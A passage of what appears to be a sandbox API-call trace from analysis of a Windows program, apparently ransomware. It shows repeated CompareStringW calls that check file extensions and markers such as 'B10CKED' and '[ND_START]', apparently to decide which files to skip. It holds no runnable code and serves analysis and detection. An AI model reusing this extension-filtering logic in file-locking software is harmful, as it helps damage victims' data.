lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0092.221] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0092.225] 
